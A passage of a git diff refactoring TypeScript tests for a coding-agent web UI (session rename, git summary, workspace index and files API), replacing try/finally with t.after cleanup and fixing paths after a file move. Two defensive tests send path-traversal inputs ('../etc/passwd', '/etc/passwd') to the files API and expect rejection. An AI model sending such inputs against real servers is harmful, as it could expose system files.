-    assert.equal(outsidePayload.success, false)
-    assert.equal(outsidePayload.code, "not_found")
-    assert.equal(getLatestSessionName(outsidePath), "Outside Session")
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests()
     onboarding.resetOnboardingServiceForTests()
     fixture.cleanup()
-  }
+  });
+
+  const renameResponse = await manageRoute.POST(
+    new Request("http://localhost/api/session/manage", {
+      method: "POST",
+      body: JSON.stringify({
+        action: "rename",
+        sessionPath: inactivePath,
+        name: "Inactive Renamed",
+      }),
+    }),
+  )
+  const renamePayload = await renameResponse.json() as any
+
+  assert.equal(renameResponse.status, 200)
+  assert.equal(renamePayload.success, true)
+  assert.equal(renamePayload.isActiveSession, false)
+  assert.equal(renamePayload.mutation, "session_file")
+  assert.equal(getLatestSessionName(inactivePath), "Inactive Renamed")
+  assert.equal(harness.commands.some((command) => command.type === "set_session_name"), false)
+
+  const outsideResponse = await manageRoute.POST(
+    new Request("http://localhost/api/session/manage", {
+      method: "POST",
+      body: JSON.stringify({
+        action: "rename",
+        sessionPath: outsidePath,
+        name: "Should Fail",
+      }),
+    }),
+  )
+  const outsidePayload = await outsideResponse.json() as any
+
+  assert.equal(outsideResponse.status, 404)
+  assert.equal(outsidePayload.success, false)
+  assert.equal(outsidePayload.code, "not_found")
+  assert.equal(getLatestSessionName(outsidePath), "Outside Session")
 })
 
-test("/api/git returns a current-project-scoped repo summary and ignores changes outside the current project subtree", async () => {
+test("/api/git returns a current-project-scoped repo summary and ignores changes outside the current project subtree", async (t) => {
   const root = mkdtempSync(join(tmpdir(), "gsd-web-git-summary-"))
   const repoRoot = join(root, "repo")
   const projectCwd = join(repoRoot, "apps", "current-project")
   const docsDir = join(repoRoot, "docs")
 
-  try {
-    mkdirSync(projectCwd, { recursive: true })
-    mkdirSync(docsDir, { recursive: true })
+  t.after(() => { rmSync(root, { recursive: true, force: true }) });
 
-    writeFileSync(join(projectCwd, "staged.txt"), "baseline staged\n")
-    writeFileSync(join(projectCwd, "dirty.txt"), "baseline dirty\n")
-    writeFileSync(join(docsDir, "outside.txt"), "baseline outside\n")
+  mkdirSync(projectCwd, { recursive: true })
+  mkdirSync(docsDir, { recursive: true })
 
-    git(repoRoot, ["init"])
-    git(repoRoot, ["config", "user.name", "GSD Test"])
-    git(repoRoot, ["config", "user.email", "gsd-test@example.com"])
-    git(repoRoot, ["add", "."])
-    git(repoRoot, ["commit", "-m", "initial"])
+  writeFileSync(join(projectCwd, "staged.txt"), "baseline staged\n")
+  writeFileSync(join(projectCwd, "dirty.txt"), "baseline dirty\n")
+  writeFileSync(join(docsDir, "outside.txt"), "baseline outside\n")
 
-    writeFileSync(join(projectCwd, "staged.txt"), "baseline staged\nnext staged line\n")
-    git(repoRoot, ["add", "apps/current-project/staged.txt"])
-    writeFileSync(join(projectCwd, "dirty.txt"), "baseline dirty\nnext dirty line\n")
-    writeFileSync(join(projectCwd, "untracked.txt"), "brand new\n")
-    writeFileSync(join(docsDir, "outside.txt"), "baseline outside\noutside change\n")
+  git(repoRoot, ["init"])
+  git(repoRoot, ["config", "user.name", "GSD Test"])
+  git(repoRoot, ["config", "user.email", "gsd-test@example.com"])
+  git(repoRoot, ["add", "."])
+  git(repoRoot, ["commit", "-m", "initial"])
 
-    const authoritativeRepoRoot = resolve(git(projectCwd, ["rev-parse", "--show-toplevel"]))
+  writeFileSync(join(projectCwd, "staged.txt"), "baseline staged\nnext staged line\n")
+  git(repoRoot, ["add", "apps/current-project/staged.txt"])
+  writeFileSync(join(projectCwd, "dirty.txt"), "baseline dirty\nnext dirty line\n")
+  writeFileSync(join(projectCwd, "untracked.txt"), "brand new\n")
+  writeFileSync(join(docsDir, "outside.txt"), "baseline outside\noutside change\n")
 
-    await withProjectGitEnv(projectCwd, async () => {
-      const response = await gitRoute.GET()
-      assert.equal(response.status, 200)
+  const authoritativeRepoRoot = resolve(git(projectCwd, ["rev-parse", "--show-toplevel"]))
 
-      const payload = await response.json() as any
-      assert.equal(payload.kind, "repo")
-      assert.equal(payload.project.scope, "current_project")
-      assert.equal(payload.project.cwd, projectCwd)
-      assert.equal(payload.project.repoRoot, authoritativeRepoRoot)
-      assert.equal(payload.project.repoRelativePath, "apps/current-project")
-      assert.equal(payload.hasChanges, true)
-      assert.equal(payload.counts.changed, 3)
-      assert.equal(payload.counts.staged, 1)
-      assert.equal(payload.counts.dirty, 1)
-      assert.equal(payload.counts.untracked, 1)
-      assert.equal(payload.counts.conflicts, 0)
-      assert.equal(payload.changedFiles.some((file: any) => file.repoPath === "docs/outside.txt"), false)
-      assert.deepEqual(
-        payload.changedFiles.map((file: any) => file.path).sort(),
-        ["dirty.txt", "staged.txt", "untracked.txt"],
-      )
-    })
-  } finally {
-    rmSync(root, { recursive: true, force: true })
-  }
+  await withProjectGitEnv(projectCwd, async () => {
+    const response = await gitRoute.GET()
+    assert.equal(response.status, 200)
+
+    const payload = await response.json() as any
+    assert.equal(payload.kind, "repo")
+    assert.equal(payload.project.scope, "current_project")
+    assert.equal(payload.project.cwd, projectCwd)
+    assert.equal(payload.project.repoRoot, authoritativeRepoRoot)
+    assert.equal(payload.project.repoRelativePath, "apps/current-project")
+    assert.equal(payload.hasChanges, true)
+    assert.equal(payload.counts.changed, 3)
+    assert.equal(payload.counts.staged, 1)
+    assert.equal(payload.counts.dirty, 1)
+    assert.equal(payload.counts.untracked, 1)
+    assert.equal(payload.counts.conflicts, 0)
+    assert.equal(payload.changedFiles.some((file: any) => file.repoPath === "docs/outside.txt"), false)
+    assert.deepEqual(
+      payload.changedFiles.map((file: any) => file.path).sort(),
+      ["dirty.txt", "staged.txt", "untracked.txt"],
+    )
+  })
 })
 
-test("/api/git exposes an explicit not-a-repo state instead of failing silently", async () => {
+test("/api/git exposes an explicit not-a-repo state instead of failing silently", async (t) => {
   const projectCwd = mkdtempSync(join(tmpdir(), "gsd-web-not-repo-"))
 
-  try {
-    await withProjectGitEnv(projectCwd, async () => {
-      const response = await gitRoute.GET()
-      assert.equal(response.status, 200)
+  t.after(() => { rmSync(projectCwd, { recursive: true, force: true }) });
 
-      const payload = await response.json() as any
-      assert.equal(payload.kind, "not_repo")
-      assert.equal(payload.project.scope, "current_project")
-      assert.equal(payload.project.cwd, projectCwd)
-      assert.equal(payload.project.repoRoot, null)
-      assert.match(payload.message, /not inside a Git repository/i)
-    })
-  } finally {
-    rmSync(projectCwd, { recursive: true, force: true })
-  }
+  await withProjectGitEnv(projectCwd, async () => {
+    const response = await gitRoute.GET()
+    assert.equal(response.status, 200)
+
+    const payload = await response.json() as any
+    assert.equal(payload.kind, "not_repo")
+    assert.equal(payload.project.scope, "current_project")
+    assert.equal(payload.project.cwd, projectCwd)
+    assert.equal(payload.project.repoRoot, null)
+    assert.match(payload.message, /not inside a Git repository/i)
+  })
 })
 
 test("browser session, settings, and git surfaces keep inspectable browse/manage/state markers on the shared surface", () => {
-  const rpcTypesSource = readFileSync(resolve(import.meta.dirname, "../../packages/pi-coding-agent/src/modes/rpc/rpc-types.ts"), "utf8")
-  const contractSource = readFileSync(resolve(import.meta.dirname, "../../web/lib/command-surface-contract.ts"), "utf8")
-  const storeSource = readFileSync(resolve(import.meta.dirname, "../../web/lib/gsd-workspace-store.tsx"), "utf8")
-  const surfaceSource = readFileSync(resolve(import.meta.dirname, "../../web/components/gsd/command-surface.tsx"), "utf8")
-  const sidebarSource = readFileSync(resolve(import.meta.dirname, "../../web/components/gsd/sidebar.tsx"), "utf8")
-  const gitRouteSource = readFileSync(resolve(import.meta.dirname, "../../web/app/api/git/route.ts"), "utf8")
+  const rpcTypesSource = readFileSync(resolve(import.meta.dirname, "../../../packages/pi-coding-agent/src/modes/rpc/rpc-types.ts"), "utf8")
+  const contractSource = readFileSync(resolve(import.meta.dirname, "../../../web/lib/command-surface-contract.ts"), "utf8")
+  const storeSource = readFileSync(resolve(import.meta.dirname, "../../../web/lib/gsd-workspace-store.tsx"), "utf8")
+  const surfaceSource = readFileSync(resolve(import.meta.dirname, "../../../web/components/gsd/command-surface.tsx"), "utf8")
+  const sidebarSource = readFileSync(resolve(import.meta.dirname, "../../../web/components/gsd/sidebar.tsx"), "utf8")
+  const gitRouteSource = readFileSync(resolve(import.meta.dirname, "../../../web/app/api/git/route.ts"), "utf8")
 
   assert.match(rpcTypesSource, /autoRetryEnabled: boolean/, "rpc-types.ts must expose retry-enabled state in get_state")
   assert.match(rpcTypesSource, /retryInProgress: boolean/, "rpc-types.ts must expose retry-in-progress state in get_state")
diff --git a/src/tests/web-state-surfaces-contract.test.ts b/src/tests/integration/web-state-surfaces-contract.test.ts
similarity index 68%
rename from src/tests/web-state-surfaces-contract.test.ts
rename to src/tests/integration/web-state-surfaces-contract.test.ts
index d69390036..58d9b89e9 100644
--- a/src/tests/web-state-surfaces-contract.test.ts
+++ b/src/tests/integration/web-state-surfaces-contract.test.ts
@@ -6,12 +6,12 @@ import { join, resolve } from "node:path";
 
 // ─── Imports ──────────────────────────────────────────────────────────
 const workspaceIndex = await import(
-  "../resources/extensions/gsd/workspace-index.ts"
+  "../../resources/extensions/gsd/workspace-index.ts"
 );
-const filesRoute = await import("../../web/app/api/files/route.ts");
+const filesRoute = await import("../../../web/app/api/files/route.ts");
 
 // Re-import status helpers from the web-side module
-const workspaceStatus = await import("../../web/lib/workspace-status.ts");
+const workspaceStatus = await import("../../../web/lib/workspace-status.ts");
 
 // ─── Helpers ──────────────────────────────────────────────────────────
 function makeGsdFixture(): { root: string; gsdDir: string; cleanup: () => void } {
@@ -26,90 +26,86 @@ function makeGsdFixture(): { root: string; gsdDir: string; cleanup: () => void }
 }
 
 // ─── Group 1: Workspace index — risk/depends/demo fields ─────────────
-test("indexWorkspace extracts risk, depends, and demo from roadmap", async () => {
+test("indexWorkspace extracts risk, depends, and demo from roadmap", async (t) => {
   const { root, gsdDir, cleanup } = makeGsdFixture();
 
-  try {
-    const milestoneDir = join(gsdDir, "milestones", "M001");
-    const sliceDir = join(milestoneDir, "slices", "S01");
-    const tasksDir = join(sliceDir, "tasks");
-    mkdirSync(tasksDir, { recursive: true });
+  t.after(() => { cleanup(); });
 
-    writeFileSync(
-      join(milestoneDir, "M001-ROADMAP.md"),
-      [
-        "# M001: Test Milestone",
-        "",
-        "## Slices",
-        "- [ ] **S01: Feature slice** `risk:high` `depends:[S00]`",
-        "  > After this: users can see the dashboard",
-      ].join("\n"),
-    );
+  const milestoneDir = join(gsdDir, "milestones", "M001");
+  const sliceDir = join(milestoneDir, "slices", "S01");
+  const tasksDir = join(sliceDir, "tasks");
+  mkdirSync(tasksDir, { recursive: true });
 
-    writeFileSync(
-      join(sliceDir, "S01-PLAN.md"),
-      [
-        "# S01: Feature slice",
-        "",
-        "**Goal:** Build the feature",
-        "**Demo:** Dashboard renders",
-        "",
-        "## Tasks",
-        "- [ ] **T01: Build thing** `est:30m`",
-        "  Do the work.",
-      ].join("\n"),
-    );
+  writeFileSync(
+    join(milestoneDir, "M001-ROADMAP.md"),
+    [
+      "# M001: Test Milestone",
+      "",
+      "## Slices",
+      "- [ ] **S01: Feature slice** `risk:high` `depends:[S00]`",
+      "  > After this: users can see the dashboard",
+    ].join("\n"),
+  );
 
-    writeFileSync(join(tasksDir, "T01-PLAN.md"), "# T01: Build thing\n\n## Steps\n- do it\n");
+  writeFileSync(
+    join(sliceDir, "S01-PLAN.md"),
+    [
+      "# S01: Feature slice",
+      "",
+      "**Goal:** Build the feature",
+      "**Demo:** Dashboard renders",
+      "",
+      "## Tasks",
+      "- [ ] **T01: Build thing** `est:30m`",
+      "  Do the work.",
+    ].join("\n"),
+  );
 
-    const index = await workspaceIndex.indexWorkspace(root);
+  writeFileSync(join(tasksDir, "T01-PLAN.md"), "# T01: Build thing\n\n## Steps\n- do it\n");
 
-    assert.equal(index.milestones.length, 1);
-    assert.equal(index.milestones[0].id, "M001");
+  const index = await workspaceIndex.indexWorkspace(root);
 
-    const slice = index.milestones[0].slices[0];
-    assert.equal(slice.id, "S01");
-    assert.equal(slice.risk, "high");
-    assert.deepEqual(slice.depends, ["S00"]);
-    assert.equal(slice.demo, "users can see the dashboard");
-    assert.equal(slice.done, false);
-    assert.equal(slice.tasks.length, 1);
-    assert.equal(slice.tasks[0].id, "T01");
-    assert.equal(slice.tasks[0].done, false);
-  } finally {
-    cleanup();
-  }
+  assert.equal(index.milestones.length, 1);
+  assert.equal(index.milestones[0].id, "M001");
+
+  const slice = index.milestones[0].slices[0];
+  assert.equal(slice.id, "S01");
+  assert.equal(slice.risk, "high");
+  assert.deepEqual(slice.depends, ["S00"]);
+  assert.equal(slice.demo, "users can see the dashboard");
+  assert.equal(slice.done, false);
+  assert.equal(slice.tasks.length, 1);
+  assert.equal(slice.tasks[0].id, "T01");
+  assert.equal(slice.tasks[0].done, false);
 });
 
-test("indexWorkspace handles slices without risk/depends/demo", async () => {
+test("indexWorkspace handles slices without risk/depends/demo", async (t) => {
   const { root, gsdDir, cleanup } = makeGsdFixture();
 
-  try {
-    const milestoneDir = join(gsdDir, "milestones", "M001");
-    const sliceDir = join(milestoneDir, "slices", "S01");
-    mkdirSync(join(sliceDir, "tasks"), { recursive: true });
+  t.after(() => { cleanup(); });
 
-    writeFileSync(
-      join(milestoneDir, "M001-ROADMAP.md"),
-      "# M001: Minimal\n\n## Slices\n- [x] **S01: Done slice**\n",
-    );
+  const milestoneDir = join(gsdDir, "milestones", "M001");
+  const sliceDir = join(milestoneDir, "slices", "S01");
+  mkdirSync(join(sliceDir, "tasks"), { recursive: true });
 
-    writeFileSync(
-      join(sliceDir, "S01-PLAN.md"),
-      "# S01: Done slice\n\n**Goal:** Done\n\n## Tasks\n",
-    );
+  writeFileSync(
+    join(milestoneDir, "M001-ROADMAP.md"),
+    "# M001: Minimal\n\n## Slices\n- [x] **S01: Done slice**\n",
+  );
 
-    const index = await workspaceIndex.indexWorkspace(root);
+  writeFileSync(
+    join(sliceDir, "S01-PLAN.md"),
+    "# S01: Done slice\n\n**Goal:** Done\n\n## Tasks\n",
+  );
 
-    const slice = index.milestones[0].slices[0];
-    // Parser defaults risk to "low" when not specified, demo to "" when no blockquote
-    assert.equal(slice.risk, "low");
-    assert.deepEqual(slice.depends, []);
-    assert.equal(slice.demo, "");
-    assert.equal(slice.done, true);
-  } finally {
-    cleanup();
-  }
+  const index = await workspaceIndex.indexWorkspace(root);
+
+  const slice = index.milestones[0].slices[0];
+  // Parser defaults risk to "low" when not specified, demo to "" when no blockquote
+  assert.equal(slice.risk, "low");
+  assert.deepEqual(slice.depends, []);
+  assert.equal(slice.demo, "");
+  assert.equal(slice.done, true);
 });
 
 // ─── Group 2: Shared status helpers ──────────────────────────────────
@@ -195,174 +191,174 @@ test("getTaskStatus returns correct statuses", () => {
 });
 
 // ─── Group 3: Files API — tree listing ───────────────────────────────
-test("files API returns tree listing of .gsd/ directory", async () => {
+test("files API returns tree listing of .gsd/ directory", async (t) => {
   const { root, gsdDir, cleanup } = makeGsdFixture();
   const origEnv = process.env.GSD_WEB_PROJECT_CWD;
 
-  try {
-    process.env.GSD_WEB_PROJECT_CWD = root;
-
-    // Create some files
-    writeFileSync(join(gsdDir, "STATE.md"), "# State\nactive");
-    writeFileSync(join(gsdDir, "PROJECT.md"), "# Project");
-    const msDir = join(gsdDir, "milestones", "M001");
-    mkdirSync(msDir, { recursive: true });
-    writeFileSync(join(msDir, "M001-ROADMAP.md"), "# Roadmap");
-
-    const request = new Request("http://localhost:3000/api/files");
-    const response = await filesRoute.GET(request);
-    assert.equal(response.status, 200);
-
-    const data = await response.json();
-    assert.ok(Array.isArray(data.tree));
-    assert.ok(data.tree.length > 0);
-
-    // Should have files at root level
-    const names = data.tree.map((n: { name: string }) => n.name);
-    assert.ok(names.includes("STATE.md"), `Expected STATE.md in tree, got: ${names}`);
-    assert.ok(names.includes("PROJECT.md"), `Expected PROJECT.md in tree, got: ${names}`);
-    assert.ok(names.includes("milestones"), `Expected milestones in tree, got: ${names}`);
-
-    // milestones should be a directory with children
-    const milestones = data.tree.find((n: { name: string }) => n.name === "milestones");
-    assert.equal(milestones.type, "directory");
-    assert.ok(Array.isArray(milestones.children));
-    assert.ok(milestones.children.length > 0);
-  } finally {
+  t.after(() => {
     process.env.GSD_WEB_PROJECT_CWD = origEnv;
     cleanup();
-  }
+  });
+
+  process.env.GSD_WEB_PROJECT_CWD = root;
+
+  // Create some files
+  writeFileSync(join(gsdDir, "STATE.md"), "# State\nactive");
+  writeFileSync(join(gsdDir, "PROJECT.md"), "# Project");
+  const msDir = join(gsdDir, "milestones", "M001");
+  mkdirSync(msDir, { recursive: true });
+  writeFileSync(join(msDir, "M001-ROADMAP.md"), "# Roadmap");
+
+  const request = new Request("http://localhost:3000/api/files");
+  const response = await filesRoute.GET(request);
+  assert.equal(response.status, 200);
+
+  const data = await response.json();
+  assert.ok(Array.isArray(data.tree));
+  assert.ok(data.tree.length > 0);
+
+  // Should have files at root level
+  const names = data.tree.map((n: { name: string }) => n.name);
+  assert.ok(names.includes("STATE.md"), `Expected STATE.md in tree, got: ${names}`);
+  assert.ok(names.includes("PROJECT.md"), `Expected PROJECT.md in tree, got: ${names}`);
+  assert.ok(names.includes("milestones"), `Expected milestones in tree, got: ${names}`);
+
+  // milestones should be a directory with children
+  const milestones = data.tree.find((n: { name: string }) => n.name === "milestones");
+  assert.equal(milestones.type, "directory");
+  assert.ok(Array.isArray(milestones.children));
+  assert.ok(milestones.children.length > 0);
 });
 
 // ─── Group 4: Files API — file content ───────────────────────────────
-test("files API returns file content for valid path", async () => {
+test("files API returns file content for valid path", async (t) => {
   const { root, gsdDir, cleanup } = makeGsdFixture();
   const origEnv = process.env.GSD_WEB_PROJECT_CWD;
 
-  try {
-    process.env.GSD_WEB_PROJECT_CWD = root;
-
-    const fileContent = "# State\n\nCurrent milestone: M001";
-    writeFileSync(join(gsdDir, "STATE.md"), fileContent);
-
-    const request = new Request("http://localhost:3000/api/files?path=STATE.md");
-    const response = await filesRoute.GET(request);
-    assert.equal(response.status, 200);
-
-    const data = await response.json();
-    assert.equal(data.content, fileContent);
-  } finally {
+  t.after(() => {
     process.env.GSD_WEB_PROJECT_CWD = origEnv;
     cleanup();
-  }
+  });
+
+  process.env.GSD_WEB_PROJECT_CWD = root;
+
+  const fileContent = "# State\n\nCurrent milestone: M001";
+  writeFileSync(join(gsdDir, "STATE.md"), fileContent);
+
+  const request = new Request("http://localhost:3000/api/files?path=STATE.md");
+  const response = await filesRoute.GET(request);
+  assert.equal(response.status, 200);
+
+  const data = await response.json();
+  assert.equal(data.content, fileContent);
 });
 
-test("files API returns content for nested files", async () => {
+test("files API returns content for nested files", async (t) => {
   const { root, gsdDir, cleanup } = makeGsdFixture();
   const origEnv = process.env.GSD_WEB_PROJECT_CWD;
 
-  try {
-    process.env.GSD_WEB_PROJECT_CWD = root;
-
-    const msDir = join(gsdDir, "milestones", "M001");
-    mkdirSync(msDir, { recursive: true });
-    writeFileSync(join(msDir, "M001-ROADMAP.md"), "# Roadmap content");
-
-    const request = new Request(
-      "http://localhost:3000/api/files?path=milestones/M001/M001-ROADMAP.md",
-    );
-    const response = await filesRoute.GET(request);
-    assert.equal(response.status, 200);
-
-    const data = await response.json();
-    assert.equal(data.content, "# Roadmap content");
-  } finally {
+  t.after(() => {
     process.env.GSD_WEB_PROJECT_CWD = origEnv;
     cleanup();
-  }
+  });
+
+  process.env.GSD_WEB_PROJECT_CWD = root;
+
+  const msDir = join(gsdDir, "milestones", "M001");
+  mkdirSync(msDir, { recursive: true });
+  writeFileSync(join(msDir, "M001-ROADMAP.md"), "# Roadmap content");
+
+  const request = new Request(
+    "http://localhost:3000/api/files?path=milestones/M001/M001-ROADMAP.md",
+  );
+  const response = await filesRoute.GET(request);
+  assert.equal(response.status, 200);
+
+  const data = await response.json();
+  assert.equal(data.content, "# Roadmap content");
 });
 
 // ─── Group 5: Files API — security: path traversal rejection ─────────
-test("files API rejects path traversal with ../", async () => {
+test("files API rejects path traversal with ../", async (t) => {
   const { root, cleanup } = makeGsdFixture();
   const origEnv = process.env.GSD_WEB_PROJECT_CWD;
 
-  try {
-    process.env.GSD_WEB_PROJECT_CWD = root;
-
-    const request = new Request(
-      "http://localhost:3000/api/files?path=../etc/passwd",
-    );
-    const response = await filesRoute.GET(request);
-    assert.equal(response.status, 400);
-
-    const data = await response.json();
-    assert.ok(data.error, "Expected error message in response");
-  } finally {
+  t.after(() => {
     process.env.GSD_WEB_PROJECT_CWD = origEnv;
     cleanup();
-  }
+  });
+
+  process.env.GSD_WEB_PROJECT_CWD = root;
+
+  const request = new Request(
+    "http://localhost:3000/api/files?path=../etc/passwd",
+  );
+  const response = await filesRoute.GET(request);
+  assert.equal(response.status, 400);
+
+  const data = await response.json();
+  assert.ok(data.error, "Expected error message in response");
 });
 
-test("files API rejects absolute paths", async () => {
+test("files API rejects absolute paths", async (t) => {
   const { root, cleanup } = makeGsdFixture();
   const origEnv = process.env.GSD_WEB_PROJECT_CWD;
 
-  try {
-    process.env.GSD_WEB_PROJECT_CWD = root;
-
-    const request = new Request(
-      "http://localhost:3000/api/files?path=/etc/passwd",
-    );
-    const response = await filesRoute.GET(request);
-    assert.equal(response.status, 400);
-
-    const data = await response.json();
-    assert.ok(data.error);
-  } finally {
+  t.after(() => {
     process.env.GSD_WEB_PROJECT_CWD = origEnv;
     cleanup();
-  }
+  });
+
+  process.env.GSD_WEB_PROJECT_CWD = root;
+
+  const request = new Request(
+    "http://localhost:3000/api/files?path=/etc/passwd",
+  );
+  const response = await filesRoute.GET(request);
+  assert.equal(response.status, 400);
+
+  const data = await response.json();
+  assert.ok(data.error);
 });
 
-test("files API returns 404 for missing files", async () => {
+test("files API returns 404 for missing files", async (t) => {
   const { root, cleanup } = makeGsdFixture();
   const origEnv = process.env.GSD_WEB_PROJECT_CWD;
 
-  try {
-    process.env.GSD_WEB_PROJECT_CWD = root;
-
-    const request = new Request(
-      "http://localhost:3000/api/files?path=nonexistent.md",
-    );
-    const response = await filesRoute.GET(request);
-    assert.equal(response.status, 404);
-
-    const data = await response.json();
-    assert.ok(data.error);
-  } finally {
+  t.after(() => {
     process.env.GSD_WEB_PROJECT_CWD = origEnv;
     cleanup();
-  }
+  });
+
+  process.env.GSD_WEB_PROJECT_CWD = root;
+
+  const request = new Request(
+    "http://localhost:3000/api/files?path=nonexistent.md",
+  );
+  const response = await filesRoute.GET(request);
+  assert.equal(response.status, 404);
+
+  const data = await response.json();
+  assert.ok(data.error);
 });
 
-test("files API returns empty tree when .gsd/ does not exist", async () => {
+test("files API returns empty tree when .gsd/ does not exist", async (t) => {
   const root = mkdtempSync(join(tmpdir(), "gsd-state-surfaces-empty-"));
   const origEnv = process.env.GSD_WEB_PROJECT_CWD;
 
-  try {
-    process.env.GSD_WEB_PROJECT_CWD = root;
-
-    const request = new Request("http://localhost:3000/api/files");
-    const response = await filesRoute.GET(request);
-    assert.equal(response.status, 200);
-
-    const data = await response.json();
-    assert.deepEqual(data.tree, []);
-  } finally {
+  t.after(() => {
     process.env.GSD_WEB_PROJECT_CWD = origEnv;
     rmSync(root, { recursive: true, force: true });
-  }
+  });
+
+  process.env.GSD_WEB_PROJECT_CWD = root;
+
+  const request = new Request("http://localhost:3000/api/files");
+  const response = await filesRoute.GET(request);
+  assert.equal(response.status, 200);
+
+  const data = await response.json();
+  assert.deepEqual(data.tree, []);
 });
 
 // ─── Group 6: Mock-free invariant — no static mock data ──────────────
@@ -388,11 +384,11 @@ const MOCK_DATA_PATTERNS = [
   /\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}.*Z["'](?:.*,\s*$)/m,  // hardcoded ISO timestamps in array literals
 ];
 
-const webRoot = resolve(import.meta.dirname, "../../web");
+const webRoot = resolve(import.meta.dirname, "../../../web");
 
 test("view components contain no static mock data arrays", () => {
   for (const filePath of VIEW_FILES) {
-    const fullPath = resolve(import.meta.dirname, "../..", filePath);
+    const fullPath = resolve(import.meta.dirname, "../../..", filePath);
     const source = readFileSync(fullPath, "utf-8");
     for (const pattern of MOCK_DATA_PATTERNS) {
       const match = source.match(pattern);
@@ -420,7 +416,7 @@ test("view components read from real data sources (store or API)", () => {
   ];
 
   for (const filePath of STORE_VIEWS) {
-    const fullPath = resolve(import.meta.dirname, "../..", filePath);
+    const fullPath = resolve(import.meta.dirname, "../../..", filePath);
     const source = readFileSync(fullPath, "utf-8");
     assert.ok(
       source.includes("gsd-workspace-store"),
@@ -429,7 +425,7 @@ test("view components read from real data sources (store or API)", () => {
   }
 
   for (const { path: filePath, apiPattern } of API_VIEWS) {
-    const fullPath = resolve(import.meta.dirname, "../..", filePath);
+    const fullPath = resolve(import.meta.dirname, "../../..", filePath);
     const source = readFileSync(fullPath, "utf-8");
     assert.ok(
       source.includes(apiPattern),
@@ -442,7 +438,7 @@ test("view components read from real data sources (store or API)", () => {
 // from the dashboard. Live signals are visible in the terminal/power mode instead.
 
 test("status bar consumes statusTexts from store", () => {
-  const statusBarPath = resolve(import.meta.dirname, "../../web/components/gsd/status-bar.tsx");
+  const statusBarPath = resolve(import.meta.dirname, "../../../web/components/gsd/status-bar.tsx");
   const source = readFileSync(statusBarPath, "utf-8");
 
   assert.ok(
@@ -456,10 +452,10 @@ test("status bar consumes statusTexts from store", () => {
 });
 
 test("browser shell renders title overrides, widgets, and editor prefills from store-backed state", () => {
-  const storePath = resolve(import.meta.dirname, "../../web/lib/gsd-workspace-store.tsx");
-  const appShellPath = resolve(import.meta.dirname, "../../web/components/gsd/app-shell.tsx");
-  const statusBarPath = resolve(import.meta.dirname, "../../web/components/gsd/status-bar.tsx");
-  const terminalPath = resolve(import.meta.dirname, "../../web/components/gsd/terminal.tsx");
+  const storePath = resolve(import.meta.dirname, "../../../web/lib/gsd-workspace-store.tsx");
+  const appShellPath = resolve(import.meta.dirname, "../../../web/components/gsd/app-shell.tsx");
+  const statusBarPath = resolve(import.meta.dirname, "../../../web/components/gsd/status-bar.tsx");
+  const terminalPath = resolve(import.meta.dirname, "../../../web/components/gsd/terminal.tsx");
 
   const storeSource = readFileSync(storePath, "utf-8");
   const appShellSource = readFileSync(appShellPath, "utf-8");
@@ -482,7 +478,7 @@ test("browser shell renders title overrides, widgets, and editor prefills from s
 });
 
 test("terminal consumes activeToolExecution from store", () => {
-  const terminalPath = resolve(import.meta.dirname, "../../web/components/gsd/terminal.tsx");
+  const terminalPath = resolve(import.meta.dirname, "../../../web/components/gsd/terminal.tsx");
   const source = readFileSync(terminalPath, "utf-8");
 
   assert.ok(
@@ -492,12 +488,12 @@ test("terminal consumes activeToolExecution from store", () => {
 });
 
 test("live browser panels consume live selectors and expose inspectable freshness markers", () => {
-  const contractPath = resolve(import.meta.dirname, "../../web/lib/command-surface-contract.ts")
-  const storePath = resolve(import.meta.dirname, "../../web/lib/gsd-workspace-store.tsx")
-  const dashboardPath = resolve(import.meta.dirname, "../../web/components/gsd/dashboard.tsx")
-  const sidebarPath = resolve(import.meta.dirname, "../../web/components/gsd/sidebar.tsx")
-  const roadmapPath = resolve(import.meta.dirname, "../../web/components/gsd/roadmap.tsx")
-  const statusBarPath = resolve(import.meta.dirname, "../../web/components/gsd/status-bar.tsx")
+  const contractPath = resolve(import.meta.dirname, "../../../web/lib/command-surface-contract.ts")
+  const storePath = resolve(import.meta.dirname, "../../../web/lib/gsd-workspace-store.tsx")
+  const dashboardPath = resolve(import.meta.dirname, "../../../web/components/gsd/dashboard.tsx")
+  const sidebarPath = resolve(import.meta.dirname, "../../../web/components/gsd/sidebar.tsx")
+  const roadmapPath = resolve(import.meta.dirname, "../../../web/components/gsd/roadmap.tsx")
+  const statusBarPath = resolve(import.meta.dirname, "../../../web/components/gsd/status-bar.tsx")
 
   const contractSource = readFileSync(contractPath, "utf-8")
   const storeSource = readFileSync(storePath, "utf-8")
@@ -532,9 +528,9 @@ test("live browser panels consume live selectors and expose inspectable freshnes
 })
 
 test("workflow action surfaces route new-milestone CTAs through the shared command path", () => {
-  const dashboardPath = resolve(import.meta.dirname, "../../web/components/gsd/dashboard.tsx")
-  const sidebarPath = resolve(import.meta.dirname, "../../web/components/gsd/sidebar.tsx")
-  const chatPath = resolve(import.meta.dirname, "../../web/components/gsd/chat-mode.tsx")
+  const dashboardPath = resolve(import.meta.dirname, "../../../web/components/gsd/dashboard.tsx")
+  const sidebarPath = resolve(import.meta.dirname, "../../../web/components/gsd/sidebar.tsx")
+  const chatPath = resolve(import.meta.dirname, "../../../web/components/gsd/chat-mode.tsx")
 
   const dashboardSource = readFileSync(dashboardPath, "utf-8")
   const sidebarSource = readFileSync(sidebarPath, "utf-8")
@@ -553,10 +549,10 @@ test("workflow action surfaces route new-milestone CTAs through the shared comma
 })
 
 test("sidebar Git affordance opens a real git-summary surface with visible repo/not-repo/error states", () => {
-  const contractPath = resolve(import.meta.dirname, "../../web/lib/command-surface-contract.ts");
-  const storePath = resolve(import.meta.dirname, "../../web/lib/gsd-workspace-store.tsx");
-  const surfacePath = resolve(import.meta.dirname, "../../web/components/gsd/command-surface.tsx");
-  const sidebarPath = resolve(import.meta.dirname, "../../web/components/gsd/sidebar.tsx");
+  const contractPath = resolve(import.meta.dirname, "../../../web/lib/command-surface-contract.ts");
+  const storePath = resolve(import.meta.dirname, "../../../web/lib/gsd-workspace-store.tsx");
+  const surfacePath = resolve(import.meta.dirname, "../../../web/components/gsd/command-surface.tsx");
+  const sidebarPath = resolve(import.meta.dirname, "../../../web/components/gsd/sidebar.tsx");
 
   const contractSource = readFileSync(contractPath, "utf-8");
   const storeSource = readFileSync(storePath, "utf-8");
@@ -577,11 +573,11 @@ test("sidebar Git affordance opens a real git-summary surface with visible repo/
 });
 
